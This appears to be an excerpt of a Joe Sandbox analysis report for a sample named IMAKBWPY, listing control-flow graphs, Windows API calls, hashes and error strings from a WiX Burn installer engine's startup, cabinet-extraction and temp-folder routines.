                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                                                                                • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                • API String ID: 1865021742-2104912459
                                                                                                                • Opcode ID: 189b3f5703d31e669b030b6518c924155414b997a5504f70d6114083e0feada2
                                                                                                                • Instruction ID: 478cf106cd42a342d2f63b0f7d9aab31928ca03916e9a5d29ec9ed17a7911b7d
                                                                                                                • Opcode Fuzzy Hash: 189b3f5703d31e669b030b6518c924155414b997a5504f70d6114083e0feada2
                                                                                                                • Instruction Fuzzy Hash: AE915C379B2633B7E3312AA55D4EF2A7950BF01B22F124212BE14BA5C0DB71DC7486D9

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 587 235195-235243 call 25f8e0 * 2 GetModuleHandleW call 2704f8 call 2706ae call 23120a 598 235245 587->598 599 235259-23526a call 2342d7 587->599 601 23524a-235254 call 270237 598->601 604 235273-23528f call 235618 CoInitializeEx 599->604 605 23526c-235271 599->605 608 2354d4-2354db 601->608 615 235291-235296 604->615 616 235298-2352a4 call 26fcae 604->616 605->601 609 2354e8-2354ea 608->609 610 2354dd-2354e3 call 275636 608->610 613 2354fa-235518 call 23d82f call 24a8d6 call 24ab24 609->613 614 2354ec-2354f3 609->614 610->609 637 235546-235559 call 234fa4 613->637 638 23551a-235522 613->638 614->613 617 2354f5 call 2441ec 614->617 615->601 624 2352a6 616->624 625 2352b8-2352c7 call 270e07 616->625 617->613 627 2352ab-2352b3 call 270237 624->627 632 2352d0-2352df call 272af7 625->632 633 2352c9-2352ce 625->633 627->608 643 2352e1-2352e6 632->643 644 2352e8-2352f7 call 273565 632->644 633->627 648 235560-235567 637->648 649 23555b call 273a35 637->649 638->637 641 235524-235527 638->641 641->637 642 235529-235544 call 24434c call 235602 641->642 642->637 643->627 656 235300-23531f GetVersionExW 644->656 657 2352f9-2352fe 644->657 653 235569 call 272efe 648->653 654 23556e-235575 648->654 649->648 653->654 659 235577 call 271479 654->659 660 23557c-235583 654->660 664 235321-23532b GetLastError 656->664 665 235359-23539e call 2333c7 call 235602 656->665 657->627 659->660 661 235585 call 26fdbd 660->661 662 23558a-23558c 660->662 661->662 669 235594-23559b 662->669 670 23558e CoUninitialize 662->670 671 235338 664->671 672 23532d-235336 664->672 689 2353b1-2353c1 call 24752a 665->689 690 2353a0-2353ab call 275636 665->690 674 2355d6-2355df call 270113 669->674 675 23559d-23559f 669->675 670->669 676 23533a 671->676 677 23533f-235354 call 233821 671->677 672->671 687 2355e1 call 2345ee 674->687 688 2355e6-2355ff call 270802 call 25e06f 674->688 681 2355a1-2355a3 675->681 682 2355a5-2355ab 675->682 676->677 677->627 686 2355ad-2355c6 call 243d85 call 235602 681->686 682->686 686->674 708 2355c8-2355d5 call 235602 686->708 687->688 702 2353c3 689->702 703 2353cd-2353d6 689->703 690->689 702->703 705 23549e-2354b4 call 234d39 703->705 706 2353dc-2353df 703->706 722 2354c0-2354d2 705->722 723 2354b6 705->723 709 235476-235489 call 234ae5 706->709 710 2353e5-2353e8 706->710 708->674 721 23548e-235492 709->721 714 2353ea-2353ed 710->714 715 23544e-23546a call 2348ef 710->715 719 235426-235442 call 234a88 714->719 720 2353ef-2353f2 714->720 715->722 729 23546c 715->729 719->722 733 235444 719->733 725 235403-235416 call 234c86 720->725 726 2353f4-2353f9 720->726 721->722 727 235494 721->727 722->608 723->722 725->722 734 23541c 725->734 726->725 727->705 729->709 733->715 734->719
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00235217
                                                                                                                  • Part of subcall function 002704F8: InitializeCriticalSection.KERNEL32(0029B5FC,?,00235223,00000000,?,?,?,?,?,?), ref: 0027050F
                                                                                                                  • Part of subcall function 0023120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,0023523F,00000000,?), ref: 00231248
                                                                                                                  • Part of subcall function 0023120A: GetLastError.KERNEL32(?,?,?,0023523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00231252
                                                                                                                • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00235285
                                                                                                                  • Part of subcall function 00270E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00270E28
                                                                                                                • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00235317
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00235321
                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0023558E
                                                                                                                Strings
                                                                                                                • Failed to initialize Regutil., xrefs: 002352C9
                                                                                                                • Failed to run per-user mode., xrefs: 00235494
                                                                                                                • Failed to initialize Wiutil., xrefs: 002352E1
                                                                                                                • Failed to initialize engine state., xrefs: 0023526C
                                                                                                                • Invalid run mode., xrefs: 002353F9
                                                                                                                • Failed to run untrusted mode., xrefs: 002354B6
                                                                                                                • Failed to initialize Cryputil., xrefs: 002352A6
                                                                                                                • 3.11.1.2318, xrefs: 00235384
                                                                                                                • Failed to run embedded mode., xrefs: 00235444
                                                                                                                • Failed to parse command line., xrefs: 00235245
                                                                                                                • Failed to initialize XML util., xrefs: 002352F9
                                                                                                                • Failed to initialize core., xrefs: 002353C3
                                                                                                                • engine.cpp, xrefs: 00235345
                                                                                                                • Failed to run per-machine mode., xrefs: 0023546C
                                                                                                                • Failed to initialize COM., xrefs: 00235291
                                                                                                                • Failed to run RunOnce mode., xrefs: 0023541C
                                                                                                                • Failed to get OS info., xrefs: 0023534F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                • API String ID: 3262001429-510904028
                                                                                                                • Opcode ID: ed1d6751ce1a1cbcba8078a93a9f7e80e9ff9374aa15a553e24a2ad974ed04d4
                                                                                                                • Instruction ID: fa3609d07809b5180c4f51aec457207389ad5737a9d6419169fc03cd4ca0de7b
                                                                                                                • Opcode Fuzzy Hash: ed1d6751ce1a1cbcba8078a93a9f7e80e9ff9374aa15a553e24a2ad974ed04d4
                                                                                                                • Instruction Fuzzy Hash: 4BB182B2D71A399BDB32AE648C46BEE76B4AF04711F4041D5F90CA6241DB709EB0CE91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 735 24752a-24756f call 25f8e0 call 23762c 740 247571-247576 735->740 741 24757b-24758c call 23c407 735->741 742 247814-24781b call 270237 740->742 747 24758e-247593 741->747 748 247598-2475a9 call 23c26e 741->748 749 24781c-247821 742->749 747->742 757 2475b5-2475ca call 23c4c8 748->757 758 2475ab-2475b0 748->758 751 247823-247824 call 275636 749->751 752 247829-24782d 749->752 751->752 755 247837-24783c 752->755 756 24782f-247832 call 275636 752->756 760 247844-247851 call 23c1bb 755->760 761 24783e-24783f call 275636 755->761 756->755 767 2475d6-2475e6 call 25c001 757->767 768 2475cc-2475d1 757->768 758->742 769 247853-247856 call 275636 760->769 770 24785b-24785f 760->770 761->760 776 2475f2-247665 call 245c33 767->776 777 2475e8-2475ed 767->777 768->742 769->770 772 247861-247864 call 275636 770->772 773 247869-24786d 770->773 772->773 779 247877-24787f 773->779 780 24786f-247872 call 233a16 773->780 784 247667-24766c 776->784 785 247671-247676 776->785 777->742 780->779 784->742 786 24767d-2476b4 call 235602 GetCurrentProcess call 270879 call 23827b 785->786 787 247678 785->787 794 2476b6 786->794 795 2476ce-2476e5 call 23827b 786->795 787->786 797 2476bb-2476c9 call 270237 794->797 801 2476e7-2476ec 795->801 802 2476ee-2476f3 795->802 797->749 801->797 803 2476f5-247707 call 23821f 802->803 804 24774f-247754 802->804 814 247713-247723 call 233436 803->814 815 247709-24770e 803->815 805 247774-24777d 804->805 806 247756-247768 call 23821f 804->806 809 24777f-247782 805->809 810 247789-24779d call 24a50c 805->810 806->805 817 24776a-24776f 806->817 809->810 813 247784-247787 809->813 824 2477a6 810->824 825 24779f-2477a4 810->825 813->810 818 2477ac-2477af 813->818 827 247725-24772a 814->827 828 24772f-247743 call 23821f 814->828 815->742 817->742 821 2477b6-2477cc call 23d5a0 818->821 822 2477b1-2477b4 818->822 832 2477d5-2477e4 call 23cbc5 821->832 833 2477ce-2477d3 821->833 822->749 822->821 824->818 825->742 827->742 828->804 834 247745-24774a 828->834 836 2477e9-2477ed 832->836 833->742 834->742 837 2477f6-24780d call 23c8e6 836->837 838 2477ef-2477f4 836->838 837->749 841 24780f 837->841 838->742 841->742
                                                                                                                Strings
                                                                                                                • WixBundleOriginalSource, xrefs: 00247759
                                                                                                                • WixBundleSourceProcessFolder, xrefs: 00247734
                                                                                                                • Failed to initialize internal cache functionality., xrefs: 0024779F
                                                                                                                • Failed to overwrite the %ls built-in variable., xrefs: 002476BB
                                                                                                                • Failed to set source process path variable., xrefs: 00247709
                                                                                                                • WixBundleUILevel, xrefs: 002476D6, 002476E7
                                                                                                                • Failed to initialize variables., xrefs: 00247571
                                                                                                                • Failed to get unique temporary folder for bootstrapper application., xrefs: 002477CE
                                                                                                                • Failed to load catalog files., xrefs: 0024780F
                                                                                                                • Failed to set source process folder variable., xrefs: 00247745
                                                                                                                • Failed to extract bootstrapper application payloads., xrefs: 002477EF
                                                                                                                • Failed to get manifest stream from container., xrefs: 002475CC
                                                                                                                • Failed to parse command line., xrefs: 00247667
                                                                                                                • Failed to get source process folder from path., xrefs: 00247725
                                                                                                                • WixBundleElevated, xrefs: 002476A5, 002476B6
                                                                                                                • Failed to set original source variable., xrefs: 0024776A
                                                                                                                • WixBundleSourceProcessPath, xrefs: 002476F8
                                                                                                                • Failed to open manifest stream., xrefs: 002475AB
                                                                                                                • Failed to load manifest., xrefs: 002475E8
                                                                                                                • Failed to open attached UX container., xrefs: 0024758E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                • API String ID: 32694325-1564579409
                                                                                                                • Opcode ID: c2d74294620243ecf7be78df6f3da457d30746394f4b033e31666fcfdc9c1e42
                                                                                                                • Instruction ID: 5a0232a4825a22b454452143f37fc358aa2df26f66eb7d898639f04c8068d859
                                                                                                                • Opcode Fuzzy Hash: c2d74294620243ecf7be78df6f3da457d30746394f4b033e31666fcfdc9c1e42
                                                                                                                • Instruction Fuzzy Hash: A8A1C7B2E64616BBDB16AAA0CC85EEEB76CBB00700F504126F925F7141D770E934DBE0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 842 23762c-237edf InitializeCriticalSection 843 237ee2-237f06 call 235623 842->843 846 237f13-237f24 call 270237 843->846 847 237f08-237f0f 843->847 850 237f27-237f39 call 25e06f 846->850 847->843 848 237f11 847->848 848->850
                                                                                                                APIs
                                                                                                                • InitializeCriticalSection.KERNEL32(0024756B,002353BD,00000000,00235445), ref: 0023764C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalInitializeSection
                                                                                                                • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                • API String ID: 32694325-3635313340
                                                                                                                • Opcode ID: 352b39e8de67894ee7da00d6a10c66c4b98ed2beeadd8b765c37cbe99e600813
                                                                                                                • Instruction ID: 91b9e40970a9309c828bf780d21f86822494ea77d4ed031f5974b273963d23b4
                                                                                                                • Opcode Fuzzy Hash: 352b39e8de67894ee7da00d6a10c66c4b98ed2beeadd8b765c37cbe99e600813
                                                                                                                • Instruction Fuzzy Hash: 34324DF0C216699BDB65CF6AC9887DDFAB4BB49304F6085EED20CB6211C7B00B948F45

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 854 2482ba-248303 call 25f8e0 857 24847c-248489 call 232195 854->857 858 248309-248317 GetCurrentProcess call 270879 854->858 865 248498-2484aa call 25e06f 857->865 866 24848b 857->866 861 24831c-248329 858->861 863 2483b7-2483c5 GetTempPathW 861->863 864 24832f-24833e GetWindowsDirectoryW 861->864 867 2483c7-2483d1 GetLastError 863->867 868 2483ff-248411 UuidCreate 863->868 869 248340-24834a GetLastError 864->869 870 248378-248389 call 23337f 864->870 871 248490-248497 call 270237 866->871 873 2483d3-2483dc 867->873 874 2483de 867->874 878 248413-248418 868->878 879 24841a-24842f StringFromGUID2 868->879 875 248357 869->875 876 24834c-248355 869->876 893 248395-2483ab call 2336a3 870->893 894 24838b-248390 870->894 871->865 873->874 882 2483e5-2483fa call 233821 874->882 883 2483e0 874->883 884 24835e-248373 call 233821 875->884 885 248359 875->885 876->875 878->871 888 248431-24844b call 233821 879->888 889 24844d-24846e call 231f13 879->889 882->871 883->882 884->871 885->884 888->871 901 248477 889->901 902 248470-248475 889->902 893->868 904 2483ad-2483b2 893->904 894->871 901->857 902->871 904->871
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00235489), ref: 00248310
                                                                                                                  • Part of subcall function 00270879: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00270897
                                                                                                                  • Part of subcall function 00270879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0024769D,00000000), ref: 002708A1
                                                                                                                  • Part of subcall function 00270879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0024769D,00000000), ref: 0027092B
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00248336
                                                                                                                • GetLastError.KERNEL32 ref: 00248340
                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 002483BD
                                                                                                                • GetLastError.KERNEL32 ref: 002483C7
                                                                                                                • UuidCreate.RPCRT4(?), ref: 00248406
                                                                                                                Strings
                                                                                                                • Failed to create working folder guid., xrefs: 00248413
                                                                                                                • %ls%ls\, xrefs: 00248458
                                                                                                                • Failed to ensure windows path for working folder ended in backslash., xrefs: 0024838B
                                                                                                                • Temp\, xrefs: 00248395
                                                                                                                • Failed to concat Temp directory on windows path for working folder., xrefs: 002483AD
                                                                                                                • Failed to convert working folder guid into string., xrefs: 00248446
                                                                                                                • Failed to copy working folder path., xrefs: 0024848B
                                                                                                                • Failed to get windows path for working folder., xrefs: 0024836E
                                                                                                                • Failed to get temp path for working folder., xrefs: 002483F5
                                                                                                                • cache.cpp, xrefs: 00248364, 002483EB, 0024843C
                                                                                                                • Failed to append bundle id on to temp path for working folder., xrefs: 00248470
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                • API String ID: 266130487-819636856
                                                                                                                • Opcode ID: c6adb86ec6c75194bd7ce0f9398a4b3b3f99e2936a28f07722cbee78987ad420
                                                                                                                • Instruction ID: de994fcd4f7b73da7e0271418455025e25614867b7ab8199228b38a876c21601
                                                                                                                • Opcode Fuzzy Hash: c6adb86ec6c75194bd7ce0f9398a4b3b3f99e2936a28f07722cbee78987ad420
                                                                                                                • Instruction Fuzzy Hash: A941FB76E71726B7D731AAA09C4DF9E776C6B01B10F0041A1BE08F7180EA74DD644BD5

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 905 2510fb-251127 CoInitializeEx 906 251129-251136 call 270237 905->906 907 25113b-251186 call 26f483 905->907 912 25139e-2513b0 call 25e06f 906->912 913 2511b0-2511d2 call 26f4a4 907->913 914 251188-2511ab call 233821 call 270237 907->914 922 25128c-251297 SetEvent 913->922 923 2511d8-2511e0 913->923 933 251397-251398 CoUninitialize 914->933 924 2512d6-2512e4 WaitForSingleObject 922->924 925 251299-2512a3 GetLastError 922->925 927 2511e6-2511ec 923->927 928 25138f-251392 call 26f4b4 923->928 929 2512e6-2512f0 GetLastError 924->929 930 251318-251323 ResetEvent 924->930 931 2512a5-2512ae 925->931 932 2512b0 925->932 927->928 935 2511f2-2511fa 927->935 928->933 936 2512f2-2512fb 929->936 937 2512fd 929->937 938 251325-25132f GetLastError 930->938 939 25135a-251360 930->939 931->932 940 2512b4-2512c4 call 233821 932->940 941 2512b2 932->941 933->912 942 251274-251287 call 270237 935->942 943 2511fc-2511fe 935->943 936->937 949 251301-251316 call 233821 937->949 950 2512ff 937->950 951 251331-25133a 938->951 952 25133c 938->952 946 251362-251365 939->946 947 25138a 939->947 980 2512c9-2512d1 call 270237 940->980 941->940 942->928 944 251211-251214 943->944 945 251200 943->945 958 251216 944->958 959 25126e 944->959 954 251206-25120f 945->954 955 251202-251204 945->955 956 251367-251381 call 233821 946->956 957 251386-251388 946->957 947->928 949->980 950->949 951->952 962 251340-251355 call 233821 952->962 963 25133e 952->963 965 251270-251272 954->965 955->965 956->980 957->928 967 251255-25125a 958->967 968 251224-251229 958->968 969 251247-25124c 958->969 970 251240-251245 958->970 971 251263-251268 958->971 972 251232-251237 958->972 973 25121d-251222 958->973 974 25125c-251261 958->974 975 25124e-251253 958->975 976 251239-25123e 958->976 977 25122b-251230 958->977 978 25126a-25126c 958->978 959->965 962->980 963->962 965->922 965->942 967->942 968->942 969->942 970->942 971->942 972->942 973->942 974->942 975->942 976->942 977->942 978->942 980->928
                                                                                                                APIs
                                                                                                                • CoInitializeEx.OLE32(00000000,00000000), ref: 0025111D
                                                                                                                • CoUninitialize.COMBASE ref: 00251398
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeUninitialize
                                                                                                                • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                • API String ID: 3442037557-1168358783
                                                                                                                • Opcode ID: bb4ea86859554b82c9abd17b60a5f7abf0ea643a1ec8661f7ee3086e47cde909
                                                                                                                • Instruction ID: 6c63066f85c854b7c20a2b10a2508ac46d83c1006a0e5fcdaa1b16d5e646d218
                                                                                                                • Opcode Fuzzy Hash: bb4ea86859554b82c9abd17b60a5f7abf0ea643a1ec8661f7ee3086e47cde909
                                                                                                                • Instruction Fuzzy Hash: E4516B37971272F79F206A949C49F6B3614AB02732F224366FD01FB291D6748C3886DD

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 986 2342d7-23432e InitializeCriticalSection * 2 call 244d05 * 2 991 234452-23445c call 23b48b 986->991 992 234334 986->992 997 234461-234465 991->997 993 23433a-234347 992->993 995 234445-23444c 993->995 996 23434d-234379 lstrlenW * 2 CompareStringW 993->996 995->991 995->993 998 2343cb-2343f7 lstrlenW * 2 CompareStringW 996->998 999 23437b-23439e lstrlenW 996->999 1000 234467-234473 call 270237 997->1000 1001 234474-23447c 997->1001 998->995 1003 2343f9-23441c lstrlenW 998->1003 1004 2343a4-2343a9 999->1004 1005 23448a-23449f call 233821 999->1005 1000->1001 1009 234422-234427 1003->1009 1010 2344b6-2344d0 call 233821 1003->1010 1004->1005 1006 2343af-2343bf call 2329ce 1004->1006 1016 2344a4-2344ab 1005->1016 1019 2343c5 1006->1019 1020 23447f-234488 1006->1020 1009->1010 1013 23442d-23443d call 2329ce 1009->1013 1010->1016 1013->1020 1024 23443f 1013->1024 1021 2344ac-2344b4 call 270237 1016->1021 1019->998 1020->1021 1021->1001 1024->995
                                                                                                                APIs
                                                                                                                • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00235266,?,?,00000000,?,?), ref: 00234303
                                                                                                                • InitializeCriticalSection.KERNEL32(000000D0,?,?,00235266,?,?,00000000,?,?), ref: 0023430C
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00235266,?,?,00000000,?,?), ref: 00234352
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00235266,?,?,00000000,?,?), ref: 0023435C
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00235266,?,?,00000000,?,?), ref: 00234370
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00235266,?,?,00000000,?,?), ref: 00234380
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00235266,?,?,00000000,?,?), ref: 002343D0
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00235266,?,?,00000000,?,?), ref: 002343DA
                                                                                                                • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00235266,?,?,00000000,?,?), ref: 002343EE
                                                                                                                • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00235266,?,?,00000000,?,?), ref: 002343FE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                • API String ID: 3039292287-3209860532
                                                                                                                • Opcode ID: 5831878788b844bbac67cabee041b9aad57e3ea2948640006a88f7b8fe51c6e9
                                                                                                                • Instruction ID: 4fb724dc00cdafff53f8260744dc11f651b78cc8a469cb61aa6987db202d58aa
                                                                                                                • Opcode Fuzzy Hash: 5831878788b844bbac67cabee041b9aad57e3ea2948640006a88f7b8fe51c6e9
                                                                                                                • Instruction Fuzzy Hash: F951D4B1A20216BECB21EF64DC86F5A7768FF05720F104165F718E7290D770B960CAA4

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1026 24e7b4-24e7f1 1027 24e813-24e834 RegisterClassW 1026->1027 1028 24e7f3-24e807 TlsSetValue 1026->1028 1030 24e836-24e840 GetLastError 1027->1030 1031 24e86e-24e8a5 CreateWindowExW 1027->1031 1028->1027 1029 24e809-24e80e 1028->1029 1034 24e93d-24e953 UnregisterClassW 1029->1034 1035 24e842-24e84b 1030->1035 1036 24e84d 1030->1036 1032 24e8a7-24e8b1 GetLastError 1031->1032 1033 24e8dc-24e8f0 SetEvent 1031->1033 1037 24e8b3-24e8bc 1032->1037 1038 24e8be 1032->1038 1039 24e91c-24e927 KiUserCallbackDispatcher 1033->1039 1035->1036 1040 24e854-24e869 call 233821 1036->1040 1041 24e84f 1036->1041 1037->1038 1042 24e8c5-24e8da call 233821 1038->1042 1043 24e8c0 1038->1043 1044 24e8f2-24e8f5 1039->1044 1045 24e929 1039->1045 1053 24e935-24e93c call 270237 1040->1053 1041->1040 1042->1053 1043->1042 1048 24e8f7-24e906 IsDialogMessageW 1044->1048 1049 24e92b-24e930 1044->1049 1045->1034 1048->1039 1052 24e908-24e916 TranslateMessage DispatchMessageW 1048->1052 1049->1053 1052->1039 1053->1034
                                                                                                                APIs
